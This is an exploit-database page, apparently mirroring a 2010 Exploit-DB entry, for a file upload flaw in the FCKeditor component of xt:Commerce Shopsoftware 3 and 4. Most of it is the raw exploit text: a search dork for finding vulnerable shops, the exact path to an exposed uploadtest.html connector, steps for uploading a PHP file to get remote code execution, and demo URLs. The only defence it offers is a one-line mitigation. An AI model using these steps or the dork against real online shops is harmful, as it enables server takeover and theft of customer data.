header-logo
Suggest Exploit
vendor:
xt:Commerce Shopsoftware
by:
Net.Edit0r
7,5
CVSS
HIGH
File Upload Vulnerability
434
CWE
Product Name: xt:Commerce Shopsoftware
Affected Version From: 3
Affected Version To: 4
Patch Exists: NO
Related CWE: N/A
CPE: a:xtcommerce:xt:commerce_shopsoftware
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux Ubuntu 9.04
2010

xt:Commerce Shopsoftware (fckeditor) File Upload Vulnerability

xt:Commerce Shopsoftware (fckeditor) is vulnerable to a file upload vulnerability. An attacker can exploit this vulnerability by accessing the uploadtest.html page and uploading a malicious file. This can lead to remote code execution.

Mitigation:

Ensure that the uploadtest.html page is not accessible to unauthorized users.
Source

Exploit-DB raw data:

=============================================================
xt:Commerce Shopsoftware (fckeditor) File Upload Vulnerability
=============================================================
###################################################
#
# Exploit Title: xt:Commerce Shopsoftware (fckeditor)
# Date: 08/11/2010
# Author: Net.Edit0r
# Software Link: www.xt-commerce.com/
# Version: 3 & 4
# Tested on: Linux Ubuntu 9.04
# dork : "eCommerce Engine © 2006 xt:Commerce Shopsoftware"
# Contact: Net.Edit0r@att.net ~ Black.hat.tm@gmail.com
#
####################################################

    exploit # admin/includes/modules/fckeditor/editor/filemanager/connectors/uploadtest.html

first go to # http://site.com/[shop]

       then # http://site.com/[shop]/admin/includes/modules/fckeditor/editor/filemanager/connectors/uploadtest.html

     select # Select the "File Uploader"> php ... upload to : Uploaded
File URL:

Demo : http://www.site.com/admin/includes/modules/fckeditor/editor/filemanager/connectors/uploadtest.html

Demo : http://www.site.com/admin/includes/modules/fckeditor/editor/filemanager/connectors/uploadtest.html

#######################################################

Home : datacoders.org ~ ajaxtm.com #Iranian HackerZ

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , Skitt3r , Zalatan , P0W3RFU7
       BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic ~ B3hz4d ~ Raiden ~ m4hd1

Navigation

Suggest Exploit

Services By CQR